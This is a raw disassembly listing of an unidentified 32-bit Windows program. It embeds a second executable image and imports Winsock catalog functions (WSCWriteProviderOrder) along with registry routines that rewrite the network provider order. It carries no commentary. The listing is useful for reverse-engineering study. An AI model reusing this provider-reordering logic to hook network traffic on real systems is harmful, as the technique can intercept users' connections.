mov large fs:0, esp
sub esp, 68h
push ebx
push esi
push edi
mov [ebp-18h], esp
xor ebx, ebx
mov [ebp-4], ebx
push 2
call dword_401158 ; __set_app_type
pop ecx
or dword_40302C, 0FFFFFFFFh
or dword_403030, 0FFFFFFFFh
call dword_40115C ; __p__fmode
mov ecx, dword_403020
mov [eax], ecx
call dword_401160 ; __p__commode
mov ecx, dword_40301C
mov [eax], ecx
mov eax, dword_401164
mov eax, [eax]
mov dword_403028, eax
call nullsub_1
cmp dword_4013A0, ebx
jnz short loc_4028D1
push offset sub_4029D0
call dword_401168 ; __setusermatherr
pop ecx
loc_4028D1: ; CODE XREF: _0:004028C3�j
call sub_4029BE
push offset dword_4011F0
push offset byte_4011EC
call sub_4029B8 ; _initterm
mov eax, dword_403018
mov [ebp-6Ch], eax
lea eax, [ebp-6Ch]
push eax
push dword_403014
lea eax, [ebp-64h]
push eax
lea eax, [ebp-70h]
push eax
lea eax, [ebp-60h]
push eax
call dword_401170 ; __getmainargs
push offset dword_4011E8
push offset byte_4011D4
call sub_4029B8 ; _initterm
add esp, 24h
mov eax, dword_401174
mov esi, [eax]
mov [ebp-74h], esi
cmp byte ptr [esi], 22h
jnz short loc_402964
loc_40292A: ; CODE XREF: _0:00402936�j
inc esi
mov [ebp-74h], esi
mov al, [esi]
cmp al, bl
jz short loc_402938
cmp al, 22h
jnz short loc_40292A
loc_402938: ; CODE XREF: _0:00402932�j
cmp byte ptr [esi], 22h
jnz short loc_402941
loc_40293D: ; CODE XREF: _0:00402949�j
inc esi
mov [ebp-74h], esi
loc_402941: ; CODE XREF: _0:0040293B�j _0:00402967�j
mov al, [esi]
cmp al, bl
jz short loc_40294B
cmp al, 20h
jbe short loc_40293D
loc_40294B: ; CODE XREF: _0:00402945�j
mov [ebp-30h], ebx
lea eax, [ebp-5Ch]
push eax
call dword_401034 ; GetStartupInfoA
test byte ptr [ebp-30h], 1
jz short loc_40296F
movzx eax, word ptr [ebp-2Ch]
jmp short loc_402972
; ---------------------------------------------------------------------------
loc_402964: ; CODE XREF: _0:00402928�j _0:0040296D�j
cmp byte ptr [esi], 20h
jbe short loc_402941
inc esi
mov [ebp-74h], esi
jmp short loc_402964
; ---------------------------------------------------------------------------
loc_40296F: ; CODE XREF: _0:0040295C�j
push 0Ah
pop eax
loc_402972: ; CODE XREF: _0:00402962�j
push eax
push esi
push ebx
push ebx
call off_401044
push eax
call sub_4029EC
mov [ebp-68h], eax
push eax
call dword_401178 ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-78h], ecx
push eax
push ecx
call sub_4029B2 ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-78h]
call dword_401180 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029AC proc near ; CODE XREF: sub_402810+23�p
jmp dword ptr loc_401193+1
sub_4029AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029B2 proc near ; CODE XREF: _0:00402998�p
jmp dword_40117C
sub_4029B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029B8 proc near ; CODE XREF: _0:004028E0�p _0:00402913�p
jmp dword_40116C
sub_4029B8 endp
; =============== S U B R O U T I N E =======================================
sub_4029BE proc near ; CODE XREF: _0:loc_4028D1�p
push 30000h
push 10000h
call sub_4029DA ; _controlfp
pop ecx
pop ecx
retn
sub_4029BE endp
; =============== S U B R O U T I N E =======================================
sub_4029D0 proc near ; DATA XREF: _0:004028C5�o
xor eax, eax
retn
sub_4029D0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029D4 proc near ; DATA XREF: _0:00402858�o
jmp dword_401154
sub_4029D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029DA proc near ; CODE XREF: sub_4029BE+A�p
jmp dword_401150
sub_4029DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029E0 proc near ; CODE XREF: sub_4014F0+118�p
; sub_401630+171�p
jmp dword_4011CC
sub_4029E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029E6 proc near ; CODE XREF: sub_4017D0+9C�p
; sub_4017D0+C9�p ...
jmp dword_4011C8
sub_4029E6 endp
; =============== S U B R O U T I N E =======================================
sub_4029EC proc near ; CODE XREF: _0:0040297D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_402A44
retn 10h
sub_4029EC endp
; =============== S U B R O U T I N E =======================================
sub_402A04 proc near ; CODE XREF: _0:00402A39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_4026E0
mov ecx, [esp+arg_0]
mov edx, [esp+arg_4]
test ecx, ecx
mov [eax+14h], cl
mov [eax+1040h], edx
jnz short loc_402A27
push 0FFFFFFFDh
call dword_401180+4
pop ecx
loc_402A27: ; CODE XREF: sub_402A04+18�j
push 1
pop eax
retn 8
sub_402A04 endp
; ---------------------------------------------------------------------------
loc_402A2D: ; DATA XREF: _0:004011D8�o
jmp $+5
push 600h
push 0
call sub_402A04
mov byte_403024, al
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402A44 proc near ; CODE XREF: sub_4029EC+10�p
jmp dword_401100
sub_402A44 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-114h]
jmp sub_40268C
; ---------------------------------------------------------------------------
loc_402A5B: ; DATA XREF: _0:00402CB4�o
mov ecx, [ebp-114h]
add ecx, 4
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-114h]
add ecx, 8
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-114h]
add ecx, 0Ch
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-114h]
add ecx, 10h
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-114h]
add ecx, 14h
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-11Ch]
jmp loc_401C50
; ---------------------------------------------------------------------------
lea ecx, [ebp-120h]
jmp sub_40268C
; ---------------------------------------------------------------------------
loc_402AB7: ; DATA XREF: sub_402240-81E�o
mov eax, offset dword_402C88
jmp sub_402800
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_4026B0
; ---------------------------------------------------------------------------
loc_402AD8: ; DATA XREF: _0:00402D14�o
mov ecx, [ebp-10h]
add ecx, 14h
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 18h
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 1Ch
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 20h
jmp sub_40268C
; =============== S U B R O U T I N E =======================================
SEH_401C70 proc near ; DATA XREF: sub_401C70+2�o
mov eax, offset dword_402CE8
jmp sub_402800
SEH_401C70 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+10h]
jmp sub_40268C
; =============== S U B R O U T I N E =======================================
SEH_401D20 proc near ; DATA XREF: sub_401D20+2�o
mov eax, offset dword_402D30
jmp sub_402800
SEH_401D20 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+0Ch]
jmp sub_40268C
; ---------------------------------------------------------------------------
loc_402B38: ; DATA XREF: _0:00402D84�o
lea ecx, [ebp+4]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_4026C8
; =============== S U B R O U T I N E =======================================
SEH_401E60 proc near ; DATA XREF: sub_401E60+2�o
mov eax, offset dword_402D58
jmp sub_402800
SEH_401E60 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+4]
jmp sub_40268C
; =============== S U B R O U T I N E =======================================
SEH_402050 proc near ; DATA XREF: sub_402050+8�o
mov eax, offset dword_402D90
jmp sub_402800
SEH_402050 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_4026B0
; ---------------------------------------------------------------------------
loc_402B88: ; DATA XREF: _0:00402DE4�o
mov ecx, [ebp-10h]
add ecx, 14h
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 18h
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 1Ch
jmp sub_40268C
; ---------------------------------------------------------------------------
loc_402BA9: ; DATA XREF: _0:004021B2�o
mov eax, offset dword_402DB8
jmp sub_402800
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_40268C
; ---------------------------------------------------------------------------
loc_402BC8: ; DATA XREF: _0:00402E24�o
mov ecx, [ebp-10h]
add ecx, 4
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 8
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 0Ch
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 10h
jmp sub_40268C
; ---------------------------------------------------------------------------
loc_402BF4: ; DATA XREF: _0:00402272�o
mov eax, offset dword_402DF8
jmp sub_402800
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-3Ch]
jmp sub_40268C
; ---------------------------------------------------------------------------
loc_402C08: ; DATA XREF: _0:00402E6C�o
lea ecx, [ebp-40h]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_402670
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-44h]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-38h]
jmp sub_40268C
; ---------------------------------------------------------------------------
lea ecx, [ebp-48h]
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-40h]
jmp sub_40268C
; ---------------------------------------------------------------------------
mov ecx, [ebp-34h]
jmp sub_40268C
; =============== S U B R O U T I N E =======================================
SEH_4022F0 proc near ; DATA XREF: sub_4022F0+2�o
mov eax, offset dword_402E40
jmp sub_402800
SEH_4022F0 endp
; ---------------------------------------------------------------------------
align 8
dword_402C88 dd 19930520h, 8, 402CA8h, 5 dup(0) ; DATA XREF: _0:loc_402AB7�o
dd 0FFFFFFFFh, 402A50h, 0
dd offset loc_402A5B
dd 1, 402A69h, 2, 402A77h, 3, 402A85h, 4, 402A93h, 5, 402AA1h
dd 6, 402AACh
dword_402CE8 dd 19930520h, 5, 402D08h, 5 dup(0) ; DATA XREF: SEH_401C70�o
dd 0FFFFFFFFh, 402AD0h, 0
dd offset loc_402AD8
dd 1, 402AE3h, 2, 402AEEh, 3, 402AF9h
dword_402D30 dd 19930520h, 1, 402D50h, 5 dup(0) ; DATA XREF: SEH_401D20�o
dd 0FFFFFFFFh, 402B10h
dword_402D58 dd 19930520h, 3, 402D78h, 5 dup(0) ; DATA XREF: SEH_401E60�o
dd 0FFFFFFFFh, 402B30h, 0
dd offset loc_402B38
dd 1, 402B40h
dword_402D90 dd 19930520h, 1, 402DB0h, 5 dup(0) ; DATA XREF: SEH_402050�o
dd 0FFFFFFFFh, 402B60h
dword_402DB8 dd 19930520h, 4, 402DD8h, 5 dup(0) ; DATA XREF: _0:loc_402BA9�o
dd 0FFFFFFFFh, 402B80h, 0
dd offset loc_402B88
dd 1, 402B93h, 2, 402B9Eh
dword_402DF8 dd 19930520h, 5, 402E18h, 5 dup(0) ; DATA XREF: _0:loc_402BF4�o
dd 0FFFFFFFFh, 402BC0h, 0
dd offset loc_402BC8
dd 1, 402BD3h, 2, 402BDEh, 3, 402BE9h
dword_402E40 dd 19930520h, 11h, 402E60h, 5 dup(0) ; DATA XREF: SEH_4022F0�o
dd 0FFFFFFFFh, 402C00h, 0
dd offset loc_402C08
dd 0FFFFFFFFh, 402C10h, 2, 402C18h, 0FFFFFFFFh, 402C20h
dd 4, 402C28h, 0FFFFFFFFh, 402C30h, 6, 402C38h, 0FFFFFFFFh
dd 402C40h, 8, 402C48h, 9, 402C50h, 8, 402C50h, 0Bh, 402C58h
dd 0Ch, 402C60h, 0Bh, 402C60h, 0Eh, 402C68h, 0Eh, 402C70h
dword_402EE8 dd 73E6BA70h, 1, 3 dup(0) ; DATA XREF: sub_402140�o
; _0:loc_402160�o
dd 1, 4 dup(0)
dd 1, 0
dd 0E0h, 0Bh dup(0)
dd 200h, 180h, 0
dd 400000h, 0
dd 14234Ah, 0Ah, 994DD8h, 3 dup(0)
dd 994DC8h, 994DE8h, 994E10h, 9 dup(0)
dd 200h, 2 dup(0)
dword_402FB0 dd 73E6BA70h, 4 dup(0) ; DATA XREF: sub_402180+2�o
; _0:loc_4021A0�o ...
dd 993BA8h, 993BF8h, 993C48h, 73EA1C58h, 3 dup(0)
dword_402FE0 dd 47A71136h ; DATA XREF: sub_4014A0+31�w
; sub_4017D0+216�r
align 8
dword_402FE8 dd 9939C8h, 993B58h, 993A18h, 993AB8h, 993A68h, 993B08h
; DATA XREF: sub_402240�o
; _0:loc_402260�o ...
dword_403000 dd 47A70000h ; DATA XREF: sub_4014A0�r
; sub_4014A0+1C�w
align 8
dword_403008 dd 3 dup(0) ; DATA XREF: sub_401C70+7B�o
; sub_4022F0+18A�o
dword_403014 dd 0 ; DATA XREF: _0:004028F1�r
dword_403018 dd 0 ; DATA XREF: _0:004028E5�r
dword_40301C dd 0 ; DATA XREF: _0:004028A4�r
dword_403020 dd 0 ; DATA XREF: _0:00402896�r
byte_403024 db 1 ; DATA XREF: _0:00402A3E�w
align 4
dword_403028 dd 0 ; DATA XREF: _0:004028B3�w
dword_40302C dd 0FFFFFFFFh ; DATA XREF: sub_402810:loc_402825�o
; _0:00402882�w
dword_403030 dd 0FFFFFFFFh ; DATA XREF: sub_402810�r
; sub_402810+1A�o ...
align 10h
dd 34F4h, 4 dup(0)
dd 3596h, 4 dup(0)
dd 3294h, 4 dup(0)
dd 32FAh, 4 dup(0)
dd 3620h, 4 dup(0)
dd 35E4h, 6 dup(0)
dd 3582h, 356Ah, 3552h, 353Eh, 352Ch, 351Ch, 350Eh, 0
dd 33EAh, 33D8h, 33FAh, 34C6h, 34DAh, 34E2h, 3410h, 341Ch
dd 342Ch, 3442h, 3456h, 346Ch, 3484h, 3494h, 34A6h, 34B6h
dd 0
dd 80001186h, 800009FAh, 800009D0h, 80001663h, 80000F52h
dd 80000441h, 8000144Fh, 8000095Ch, 80000D12h, 800014B4h
dd 800014B6h, 80000AA5h, 80000FEFh, 8000125Ah, 800014BBh
dd 800014A9h, 80001652h, 80000BA6h, 80000C4Bh, 800018E7h
dd 80001171h, 80000C40h, 80000CBEh, 80000BA9h, 80000C09h
dd 80000BA0h, 80000EF6h, 80000EF7h, 80000EF1h, 80000C07h
dd 80000FF0h, 8000120Eh, 80001148h, 80000E9Ah, 80000231h
dd 80000339h, 8000032Fh, 8000106Bh, 800010B2h, 80000628h
dd 80000490h, 80000162h, 80001442h, 800007BBh, 80000299h
dd 800004DFh, 8000021Dh, 80000219h, 80000321h, 80000217h
dd 8000021Ch, 8000106Ah, 8000039Ch, 8000035Ah, 80000320h
dd 8000035Ch, 80000CBBh, 80001241h, 0
; ---------------------------------------------------------------------------
retf 33h
; ---------------------------------------------------------------------------
align 4
dd 33B6h, 33A4h, 3396h, 3386h, 3376h, 3362h, 3356h, 3346h
dd 333Ch, 3334h, 3326h, 331Eh, 3638h, 329Eh, 32A8h, 3314h
dd 3306h, 32F2h, 32E8h, 32E0h, 32D8h, 32C4h, 32BAh, 32B2h
dd 0
dd 35F0h, 3602h, 3612h, 0
dd 35D0h, 35BAh, 9Ch dup(0)
dd 53550000h, 32335245h, 6C6C642Eh, 26h dup(0)
dd 4C454853h, 2E32334Ch, 6C6C64h, 33656C6Fh, 6C642E32h
dd 6Ch, 1Ch dup(0)
dd 494E4957h, 2E54454Eh, 6C6C64h, 2D6h dup(0)
dd 440003h, 4C004Ch, 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0
dd 40h, 8 dup(0)
dd 0E8h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 0EC6425DDh, 3 dup(0BF0A4499h), 0BF054C1Ah, 0BF0A4498h
dd 0BF574C1Ah, 0BF0A449Eh, 0BF0B4499h, 0BF0A4480h, 0BF564C1Ah
dd 0BF0A4498h, 0BF554C17h, 0BF0A449Dh, 0BF544C1Ah, 0BF0A4498h
dd 0BF504C1Ah, 0BF0A4498h, 68636952h, 0BF0A4499h, 6 dup(0)
dd 4550h, 4014Ch, 3E80257Ch, 2 dup(0)
dd 210E00E0h, 0A07010Bh, 1000h, 1A0E00h, 0
dd 1130h, 1000h, 2000h, 47A70000h, 1000h, 200h, 2 dup(20005h)
dd 4, 0
dd 1A5000h, 400h, 5086h, 4000002h, 40000h, 1000h, 100000h
dd 1000h, 0
dd 10h, 1F70h, 75h, 1D00h, 3Ch, 1A3000h, 400h, 4 dup(0)
dd 1A4000h, 110h, 1070h, 1Ch, 0Ah dup(0)
dd 1000h, 64h, 6 dup(0)
dd 7865742Eh, 74h, 0FE5h, 2 dup(1000h), 400h, 3 dup(0)
dd 60000020h, 7461642Eh, 61h, 1A0188h, 2000h, 200h, 1400h
dd 3 dup(0)
dd 0C0000040h, 7273722Eh, 63h, 400h, 1A3000h, 400h, 1600h
dd 3 dup(0)
dd 40000040h, 6C65722Eh, 636Fh, 75Ch, 1A4000h, 800h, 1A00h
dd 3 dup(0)
dd 42000040h, 60h dup(0)
dd 1F2Eh, 1F20h, 1F10h, 1EFEh, 1F42h, 0
dd 1DE2h, 1DF8h, 1E08h, 1E1Ah, 1E2Eh, 1E3Ah, 1DD6h, 1E64h
dd 1E7Ah, 1E90h, 1EAAh, 1EBEh, 1ED2h, 1DCAh, 1DBEh, 1DAEh
dd 1DA0h, 1E54h, 5 dup(0)
dd 3E800169h, 0
dd 2, 1Ch, 110Ch, 50Ch, 6B636150h, 61436465h, 6F6C6174h
dd 65744967h, 6Dh, 5Ch, 57435357h, 65746972h, 766F7250h
dd 72656469h, 6564724Fh, 72h, 5F325357h, 442E3233h, 4C4Ch
dd 57435357h, 65746972h, 656D614Eh, 63617053h, 64724F65h
dd 7265h, 61686E55h, 656C646Eh, 63784564h, 69747065h, 69466E6Fh
dd 7265746Ch, 0
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
aNb10 db 'NB10',0
align 4
dd 3E800169h, 1, 726F7073h, 2E726564h, 626470h, 2 dup(0)
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov eax, 2384h
lea ebp, [esp-498h]
call sub_405258
mov eax, ds:47A72134h
push ebx
push 47A710BCh
mov [ebp+494h], eax
call dword ptr ds:47A71024h
xor ebx, ebx
cmp eax, ebx
jz short loc_404720
push 47A710A4h
push eax
call dword ptr ds:47A71020h
cmp eax, ebx
jz short loc_404720
push dword ptr [ebp+4A4h]
push dword ptr [ebp+4A0h]
call eax ; _acmdln
jmp loc_404AD7
; ---------------------------------------------------------------------------
loc_404720: ; CODE XREF: _0:004046FB�j _0:0040470B�j
cmp dword ptr [ebp+4A4h], 3E8h
mov [ebp+80h], ebx
jbe short loc_40473A
push 8
pop eax
jmp loc_404AD7
; ---------------------------------------------------------------------------
loc_40473A: ; CODE XREF: _0:00404730�j
push 47A7211Ch
push ebx
push ebx
call dword ptr ds:47A7101Ch
cmp eax, ebx
mov [ebp+68h], eax
jnz short loc_404758
mov eax, 277Bh
jmp loc_404AD7
; ---------------------------------------------------------------------------
loc_404758: ; CODE XREF: _0:0040474C�j
push ebx
push dword ptr [ebp+68h]
call dword ptr ds:47A71018h
cmp eax, 102h
jnz short loc_404778
mov dword ptr [ebp+80h], 2AFAh
jmp loc_404AC8
; ---------------------------------------------------------------------------
loc_404778: ; CODE XREF: _0:00404767�j
push esi
lea eax, [ebp+7Ch]
push eax
push 1
push ebx
mov esi, 47A72010h
push esi
push 80000002h
call dword ptr ds:47A71010h
cmp eax, ebx
jz short loc_4047A0
mov [ebp+80h], eax
jmp loc_404ABE
; ---------------------------------------------------------------------------
loc_4047A0: ; CODE XREF: _0:00404793�j
push edi
lea eax, [ebp+70h]
push eax
lea eax, [ebp+84h]
push eax
lea eax, [ebp+60h]
push eax
push ebx
push 47A72070h
push dword ptr [ebp+7Ch]
mov dword ptr [ebp+70h], 104h
call dword ptr ds:47A71000h
push dword ptr [ebp+7Ch]
mov edi, eax
call dword ptr ds:47A71004h
cmp edi, ebx
jz short loc_4047E0
mov [ebp+80h], edi
jmp loc_404ABD
; ---------------------------------------------------------------------------
loc_4047E0: ; CODE XREF: _0:004047D3�j
lea eax, [ebp+84h]
push eax
push 47A72048h
call dword ptr ds:47A71030h
test eax, eax
jz short loc_404805
loc_4047F6: ; CODE XREF: _0:00404981�j _0:00404998�j ...
mov dword ptr [ebp+80h], 2726h
jmp loc_404ABD
; ---------------------------------------------------------------------------
loc_404805: ; CODE XREF: _0:004047F4�j
mov ebx, ds:47A7104Ch
push esi
lea eax, [ebp+390h]
push eax
call ebx
mov esi, ds:47A71050h
mov edi, 47A710A0h
push edi
lea eax, [ebp+390h]
push eax
call esi
push 47A72048h
lea eax, [ebp+390h]
push eax
call esi
push edi
lea eax, [ebp+390h]
push eax
call esi
push 47A720A8h
lea eax, [ebp+390h]
push eax
call esi
lea eax, [ebp+7Ch]
push eax
push 9
push 0
lea eax, [ebp+390h]
push eax
push 80000002h
call dword ptr ds:47A71010h
test eax, eax
jnz loc_404AB7
and [ebp+78h], eax
mov dword ptr [ebp+6Ch], 47A72140h
mov dword ptr [ebp+74h], 47BD1A40h
loc_404883: ; CODE XREF: _0:0040497B�j
lea eax, [ebp+54h]
push eax
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+5Ch]
push eax
lea eax, [ebp+188h]
push eax
push dword ptr [ebp+78h]
mov dword ptr [ebp+5Ch], 104h
push dword ptr [ebp+7Ch]
mov byte ptr [ebp+188h], 0
call dword ptr ds:47A71008h
cmp eax, 103h
jz loc_404986
test eax, eax
jnz loc_404AB7
lea eax, [ebp+390h]
push eax
lea eax, [ebp+28Ch]
push eax
call ebx
push edi
lea eax, [ebp+28Ch]
push eax
call esi
lea eax, [ebp+188h]
push eax
lea eax, [ebp+28Ch]
push eax
call esi
lea eax, [ebp+28Ch]
push eax
push dword ptr [ebp+74h]
call ebx
lea eax, [ebp+64h]
push eax
push 9
push 0
lea eax, [ebp+28Ch]
push eax
push 80000002h
call dword ptr ds:47A71010h
test eax, eax
jnz loc_404AB7
lea eax, [ebp+70h]
push eax
push dword ptr [ebp+6Ch]
lea eax, [ebp+60h]
push eax
push 0
push 47A7108Ch
push dword ptr [ebp+64h]
mov dword ptr [ebp+70h], 378h
mov dword ptr [ebp+60h], 3
call dword ptr ds:47A71000h
test eax, eax
mov ecx, [ebp+70h]
mov edx, [ebp+78h]
mov ds:47C111E0h[edx*4], ecx
jnz loc_404AB7
push dword ptr [ebp+64h]
call dword ptr ds:47A71004h
add dword ptr [ebp+74h], 104h
inc dword ptr [ebp+78h]
add dword ptr [ebp+6Ch], 378h
cmp dword ptr [ebp+74h], 47C111E0h
jl loc_404883
jmp loc_4047F6
; ---------------------------------------------------------------------------
loc_404986: ; CODE XREF: _0:004048B6�j
push dword ptr [ebp+7Ch]
call dword ptr ds:47A71004h
mov ebx, [ebp+4A4h]
cmp [ebp+78h], ebx
jnz loc_4047F6
mov edx, ebx
shl edx, 2
mov ecx, edx
mov esi, ecx
shr ecx, 2
xor eax, eax
lea edi, [ebp-0F4Ch]
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
mov ecx, edx
shr ecx, 2
xor eax, eax
lea edi, [ebp-1EECh]
rep stosd
mov ecx, edx
and ecx, 3
xor esi, esi
test ebx, ebx
rep stosb
jbe short loc_404A23
mov edi, [ebp+4A0h]
lea eax, [ebp-0F4Ch]
sub edi, eax
mov dword ptr [ebp+4A4h], 47A72268h
loc_4049EF: ; CODE XREF: _0:00404A21�j
mov eax, [ebp+4A4h]
mov ecx, [eax]
xor edx, edx
loc_4049F9: ; CODE XREF: _0:00404A12�j
lea eax, [ebp+edx*4-0F4Ch]
cmp ecx, [edi+eax]
jnz short loc_404A0F
or dword ptr [eax], 0FFFFFFFFh
mov [ebp+edx*4-1EECh], esi
loc_404A0F: ; CODE XREF: _0:00404A03�j
inc edx
cmp edx, ebx
jb short loc_4049F9
add dword ptr [ebp+4A4h], 378h
inc esi
cmp esi, ebx
jb short loc_4049EF
loc_404A23: ; CODE XREF: _0:004049D5�j
xor eax, eax
test ebx, ebx
jbe short loc_404A3C
loc_404A29: ; CODE XREF: _0:00404A3A�j
cmp dword ptr [ebp+eax*4-0F4Ch], 0FFFFFFFFh
jnz loc_4047F6
inc eax
cmp eax, ebx
jb short loc_404A29
loc_404A3C: ; CODE XREF: _0:00404A27�j
xor edi, edi
test ebx, ebx
jbe short loc_404ABD
mov dword ptr [ebp+4A4h], 47BD1A40h
loc_404A4C: ; CODE XREF: _0:00404AB3�j
mov esi, [ebp+edi*4-1EECh]
cmp esi, edi
jz short loc_404AA6
lea eax, [ebp+7Ch]
push eax
push 2
push 0
push dword ptr [ebp+4A4h]
push 80000002h
call dword ptr ds:47A71010h
test eax, eax
jnz short loc_404AB7
push dword ptr ds:47C111E0h[edi*4]
imul esi, 378h
add esi, 47A72140h
push esi
push 3
push eax
push 47A7108Ch
push dword ptr [ebp+7Ch]
call dword ptr ds:47A7100Ch
test eax, eax
jnz short loc_404AB7
push dword ptr [ebp+7Ch]
call dword ptr ds:47A71004h
loc_404AA6: ; CODE XREF: _0:00404A55�j
add dword ptr [ebp+4A4h], 104h
inc edi
cmp edi, ebx
jb short loc_404A4C
jmp short loc_404ABD
; ---------------------------------------------------------------------------
loc_404AB7: ; CODE XREF: _0:0040486C�j _0:004048BE�j ...
mov [ebp+80h], eax
loc_404ABD: ; CODE XREF: _0:004047DB�j _0:00404800�j ...
pop edi
loc_404ABE: ; CODE XREF: _0:0040479B�j
push dword ptr [ebp+68h]
call dword ptr ds:47A71054h
pop esi
loc_404AC8: ; CODE XREF: _0:00404773�j
push dword ptr [ebp+68h]
call dword ptr ds:47A71058h
mov eax, [ebp+80h]
loc_404AD7: ; CODE XREF: _0:0040471B�j _0:00404735�j ...
mov ecx, [ebp+494h]
pop ebx
call sub_4051B0
add ebp, 498h
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404AED proc near ; CODE XREF: _0:00404F2A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ds:47A71000h
push edi
mov edi, [ebp+arg_4]
lea eax, [ebp+var_4]
push eax
lea eax, [edi+10h]
push eax
lea eax, [ebp+arg_4]
push eax
push 0
push 47A720B8h
push [ebp+arg_0]
mov [ebp+var_4], 104h
call esi
test eax, eax
jnz loc_404BFA
push ebx
push 4
pop ebx
lea eax, [ebp+var_4]
push eax
lea eax, [edi+114h]
push eax
lea eax, [ebp+arg_4]
push eax
push 0
push 47A720C8h
push [ebp+arg_0]
mov [ebp+var_4], ebx
call esi
test eax, eax
jnz loc_404BF9
lea eax, [ebp+var_4]
push eax
lea eax, [edi+118h]
push eax
lea eax, [ebp+arg_4]
push eax
push 0
push 47A720D0h
push [ebp+arg_0]
mov [ebp+var_4], 104h
call esi
test eax, eax
jnz loc_404BF9
lea eax, [ebp+var_4]
push eax
push edi
lea eax, [ebp+arg_4]
push eax
push 0
push 47A720DCh
push [ebp+arg_0]
mov [ebp+var_4], 10h
call esi
test eax, eax
jnz short loc_404BF9
lea eax, [ebp+var_4]
push eax
lea eax, [edi+21Ch]
push eax
lea eax, [ebp+arg_4]
push eax
push 0
push 47A720E8h
push [ebp+arg_0]
mov [ebp+var_4], ebx
call esi
test eax, eax
jnz short loc_404BF9
lea eax, [ebp+var_4]
push eax
lea eax, [edi+220h]
push eax
lea eax, [ebp+arg_4]
push eax
push 0
push 47A72100h
push [ebp+arg_0]
mov [ebp+var_4], ebx
call esi
test eax, eax
jnz short loc_404BF9
lea eax, [ebp+var_4]
push eax
add edi, 224h
push edi
lea eax, [ebp+arg_4]
push eax
push 0
push 47A72114h
push [ebp+arg_0]
mov [ebp+var_4], ebx
call esi
loc_404BF9: ; CODE XREF: sub_404AED+5A�j
; sub_404AED+84�j ...
pop ebx
loc_404BFA: ; CODE XREF: sub_404AED+30�j
pop edi
pop esi
leave
retn 8
sub_404AED endp
; =============== S U B R O U T I N E =======================================
sub_404C00 proc near ; CODE XREF: _0:004050D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
